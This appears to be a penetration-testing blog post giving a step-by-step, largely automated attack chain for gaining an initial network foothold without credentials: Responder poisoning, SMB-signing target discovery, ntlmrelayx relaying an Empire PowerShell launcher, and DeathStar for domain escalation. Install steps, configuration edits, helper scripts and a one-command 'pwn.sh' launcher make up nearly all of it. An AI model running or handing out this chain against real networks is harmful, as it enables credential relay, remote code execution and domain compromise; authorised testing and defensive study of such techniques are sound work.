This document pools several awesome tools and blog entries together (see "Resources" at the end of this doc) in an attempt to automate the process of getting an initial foothold on a network in a situation where you have no valid credentials.
Ok, so one weird thing I'm still trying to figure out: if I install ntlmrelayx (part of impacket) as the first tool, these steps seem to work fine:
git clone https://github.com/CoreSecurity/impacket.git /opt/impacket
cd /opt/impacket
pip install .
However, if I install other tools like Empire first, the impacket install complains about not being able to install/uninstall the updated version. When I raised this as an issue, the suggested way to handle it was:
sudo apt-get remove python-impacket
git clone https://github.com/CoreSecurity/impacket.git /opt/impacket
cd /opt/impacket
pip install .
However, by doing that it rips out a bunch of other packages, so then you have to reinstall them with something like:
apt-get install crackmapexec enum4linux kali-linux-full keimpx polenum set smbmap sparta wol-e -y
So long story short: handle the ntlmrelayx install with care.
git clone https://github.com/EmpireProject/Empire.git /opt/empire
cd /opt/empire
./setup/install.sh
git clone https://github.com/byt3bl33d3r/DeathStar.git /opt/deathstar
git clone https://github.com/lgandx/Responder.git /opt/responder
Now open /opt/responder/Responder.conf and turn the SMB and HTTP servers off. ntlmrelayx has to bind ports 445 and 80 itself so it can catch the connections that Responder poisons toward your box; if Responder is also holding those ports, ntlmrelayx either fails to start or never sees the authentications. Both are "On" by default, so change them to "Off" (lines starting with ";" are comments):
[Responder Core]
; Servers to start
SQL = On
; SMB is On by default; Off so ntlmrelayx can listen on 445
SMB = Off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
; HTTP is On by default; Off so ntlmrelayx can listen on 80
HTTP = Off
HTTPS = On
DNS = On
LDAP = On
mkdir /scripts
cd /scripts
/opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt
grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt
The resulting targets.txt should have a list of IPs with SMB signing disabled. These are the only hosts worth relaying to: a server that requires SMB signing rejects the relayed session because the relay sits in the middle and never has the key needed to sign, so hosts reported as Signing:'True' are filtered out on purpose:
192.168.55.36
192.168.55.144
192.168.55.199
...
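As an added example (not part of the original write-up and not code from Responder), here is a small shell helper that does the targets.txt step above, but also keeps the hosts that do require signing in a separate list so you can see what you are skipping and why. The sample lines are constructed to approximate what RunFinger.py -g prints and are not real scan results; the file names and the assumption that no other dotted quad appears on a line are mine.

```bash
#!/usr/bin/env bash
# Added example (not from the original write-up): turn RunFinger output into
# two lists, relay targets (signing not required) and hosts to leave alone
# (signing required). File names and the sample lines are assumptions.
set -u

# Constructed sample approximating what "RunFinger.py -g" prints; it is not
# real scan output. Note the duplicate 192.168.55.144 and the signed 192.168.55.10.
SAMPLE_HOSTS="$(cat <<'EOF'
['192.168.55.36', Os:'Windows 7 Professional 7601 Service Pack 1', Domain:'CORP', Signing:'False', Null Session:'False', RDP:'True', SMB1:'True', MSSQL:'False']
['192.168.55.10', Os:'Windows Server 2012 R2 Standard 9600', Domain:'CORP', Signing:'True', Null Session:'False', RDP:'True', SMB1:'False', MSSQL:'False']
['192.168.55.144', Os:'Windows 10 Pro 15063', Domain:'CORP', Signing:'False', Null Session:'False', RDP:'False', SMB1:'False', MSSQL:'False']
['192.168.55.144', Os:'Windows 10 Pro 15063', Domain:'CORP', Signing:'False', Null Session:'False', RDP:'False', SMB1:'False', MSSQL:'False']
['192.168.55.199', Os:'Windows 7 Enterprise 7601 Service Pack 1', Domain:'CORP', Signing:'False', Null Session:'True', RDP:'True', SMB1:'True', MSSQL:'False']
EOF
)"

# Four dotted octets; assumes the OS/domain strings never contain one.
IPV4_RE='[0-9]{1,3}(\.[0-9]{1,3}){3}'

# Read RunFinger lines on stdin and print the unique IPs whose Signing value
# is $1 (True or False), sorted numerically octet by octet.
hosts_with_signing() {
    grep -F "Signing:'$1'" | grep -oE "$IPV4_RE" \
        | sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n -u
}

# Write targets.txt (relay candidates, what ntlmrelayx -tf consumes) and
# signed.txt (hosts that would reject a relayed session) into $2, then
# print the number of relay targets found.
build_target_lists() {
    local hosts_file="$1" outdir="$2"
    hosts_with_signing False < "$hosts_file" > "$outdir/targets.txt"
    hosts_with_signing True  < "$hosts_file" > "$outdir/signed.txt"
    wc -l < "$outdir/targets.txt" | tr -d ' '
}

# Usage: ./pick_targets.sh /scripts/hosts.txt /scripts
if [ "$#" -eq 2 ]; then
    n=$(build_target_lists "$1" "$2")
    echo "$n relay targets written to $2/targets.txt; signing-required hosts listed in $2/signed.txt"
fi
```

Keeping signed.txt around is useful for the report: those are the hosts where the relay would have failed, and "SMB signing required" is the fix you will be recommending for everything in targets.txt.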
Create the helper scripts. Run this as the user that owns /scripts (or as root): putting sudo in front of echo does not help with a root-owned directory, because sudo applies to echo and not to the ">" redirect; if you need it, use echo ... | sudo tee FILE instead.
mkdir -p /scripts   # already exists if you ran the RunFinger step above
cd /scripts
echo "cd /opt/empire" > empire.sh
echo "sudo ./empire --rest --username empireadmin --password Password123" >> empire.sh
echo "sudo /opt/deathstar/DeathStar.py --listener-ip YOUR.IP -t 100" > deathstar.sh
echo "# In the script below, replace YOUR-POWERSHELL with what you get from Empire." > ntlmrelayx.sh
echo "sudo python /opt/impacket/examples/ntlmrelayx.py -tf /scripts/targets.txt -c 'YOUR-POWERSHELL'" >> ntlmrelayx.sh
echo "sudo python /opt/responder/Responder.py -I YOUR-LAN-INTERFACE -r -d -v" > responder.sh
Note on the Responder flags: in the Responder of this era -r answers NetBIOS wredir suffix queries and -d answers NetBIOS domain suffix queries; the short options have been reassigned in later releases, so check Responder.py -h against your checkout.
Now open up all the scripts created in /scripts and adjust as necessary. Note: you won't be able to totally fill in the necessary info for ntlmrelayx.sh just yet (the PowerShell launcher comes from Empire), so wait until you proceed to the next section:
cd /scripts
chmod +x deathstar.sh
chmod +x empire.sh
chmod +x ntlmrelayx.sh
chmod +x responder.sh
Get Empire running in a screen session (-L logs the session to screenlog.0 in the current directory, which is why we cd to /scripts first):
cd /scripts
screen -S empire -dm -L /scripts/empire.sh
Get DeathStar running in a screen session:
screen -S deathstar -dm /scripts/deathstar.sh
Connect to the Empire screen session:
screen -R empire
At the empire prompt, run these commands to get the DeathStar PowerShell code:
listeners
launcher powershell DeathStar
Now press Ctrl+A and then D to detach from the screen session. In /scripts there should be a screenlog.0 file, which is a log of everything happening in the Empire screen session. Do a cat screenlog.0 and copy the entire chunk of code that starts with powershell and ends with something like 0238jfDAfhAdfAkdf==
Next, open /scripts/ntlmrelayx.sh and where you see YOUR-POWERSHELL paste the PowerShell that you got in the previous steps. Remember that in this script the whole launcher sits between a pair of single quotes ('): one just before powershell and one right after the trailing == of the base64 blob. Keep both, and don't let any other quote characters slip in, or the shell will split the -c argument and ntlmrelayx will run a truncated command.
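Hand-pasting a long one-liner between two single quotes is where this step usually goes wrong, so here is an added helper (not from the original write-up, not part of impacket or Empire) that takes the other route: save the launcher to a file, sanity-check its shape, and generate an ntlmrelayx.sh that reads the file at run time so the PowerShell never passes through shell quoting. The base64 in the sample is UTF-16LE "hi", a constructed placeholder rather than a real stager; the file paths, and the assumption that the launcher uses Empire's "powershell ... -enc <base64>" form, are mine.

```bash
#!/usr/bin/env bash
# Added example (not from the original write-up): build ntlmrelayx.sh from a
# launcher saved to a file, so the PowerShell one-liner never has to be pasted
# between single quotes by hand. Paths and file names are assumptions.
set -u

# Constructed stand-in for an Empire launcher. The base64 is UTF-16LE "hi",
# not a real stager; a real one is far longer but has the same shape.
SAMPLE_LAUNCHER='powershell -noP -sta -w 1 -enc aABpAA=='

# Return 0 if the file holds exactly one line shaped like an Empire PowerShell
# launcher: starts with "powershell", ends in "-enc" plus a pure base64 blob.
# Anything else (quotes, shell metacharacters, a second line) is rejected,
# because that is exactly what breaks the -c argument.
validate_launcher() {
    local f="$1"
    [ -s "$f" ] || return 1
    [ "$(grep -c '' "$f")" -eq 1 ] || return 1
    grep -qE '^powershell.* -enc +[A-Za-z0-9+/]+={0,2}$' "$f"
}

# Write a relay script that reads the launcher from LAUNCHER_FILE when it
# runs. Returns 1 and writes nothing if the launcher does not validate.
write_relay_script() {
    local launcher_file="$1" targets_file="$2" out="$3"
    validate_launcher "$launcher_file" || return 1
    cat > "$out" <<EOF
#!/bin/sh
# Generated by write_relay_script. The launcher is read from a file, so the
# PowerShell text never goes through this script's quoting rules.
exec sudo python /opt/impacket/examples/ntlmrelayx.py -tf "$targets_file" -c "\$(cat "$launcher_file")"
EOF
    chmod +x "$out"
}

# Usage: ./mkrelay.sh /scripts/launcher.txt /scripts/targets.txt /scripts/ntlmrelayx.sh
if [ "$#" -eq 3 ]; then
    if write_relay_script "$1" "$2" "$3"; then
        echo "wrote $3"
    else
        echo "launcher in $1 does not look like a single 'powershell ... -enc <base64>' line" >&2
        exit 1
    fi
fi
```

Paste the launcher from screenlog.0 into /scripts/launcher.txt as its only line, run the helper, and the generated ntlmrelayx.sh can be dropped into the screen command below unchanged. If you regenerate the Empire launcher later, you only overwrite launcher.txt.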
Run a new screen session with ntlmrelayx:
screen -S ntlmrelayx -dm /scripts/ntlmrelayx.sh
Note: you might find that when running ntlmrelayx.sh the console barfs up some weird error like:
Traceback (most recent call last):
  File "examples/ntlmrelayx.py", line 45, in <module>
    from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer
  File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/servers/__init__.py", line 1, in <module>
    from httprelayserver import HTTPRelayServer
  File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/servers/httprelayserver.py", line 27, in <module>
    from impacket.examples.ntlmrelayx.clients import SMBRelayClient, MSSQLRelayClient, LDAPRelayClient, HTTPRelayClient
  File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/clients/__init__.py", line 3, in <module>
    from ldaprelayclient import LDAPRelayClient
  File "/usr/lib/python2.7/dist-packages/impacket/examples/ntlmrelayx/clients/ldaprelayclient.py", line 17, in <module>
    from ldap3 import Server, Connection, ALL, NTLM, RESULT_SUCCESS, MODIFY_ADD
ImportError: cannot import name RESULT_SUCCESS
If that happens, the paths in the traceback tell you what went wrong: Python is importing impacket from /usr/lib/python2.7/dist-packages (the Kali python-impacket package), not the copy you cloned into /opt/impacket, and that package expects a different ldap3 than the one installed. You may need to rip and replace your version of impacket. See the section above where I address this, as well as the GitHub issue here that should help you.
Run a new screen session with Responder:
screen -S responder -dm /scripts/responder.sh
Keep an eye on Empire and DeathStar screen sessions to watch the shells come pouring in:
screen -R empire
screen -R deathstar
Have fun :-)
Put the following commands in a file called /scripts/pwn.sh (and chmod +x it) so the whole chain can be started with one command:
#!/bin/bash
cd /scripts   # screenlog.0 is written to the directory screen is started from
screen -S empire -dm -L /scripts/empire.sh
sleep 15      # give Empire's REST API time to come up before DeathStar logs in to it
screen -S deathstar -dm /scripts/deathstar.sh
screen -S ntlmrelayx -dm /scripts/ntlmrelayx.sh
screen -S responder -dm /scripts/responder.sh
Resources: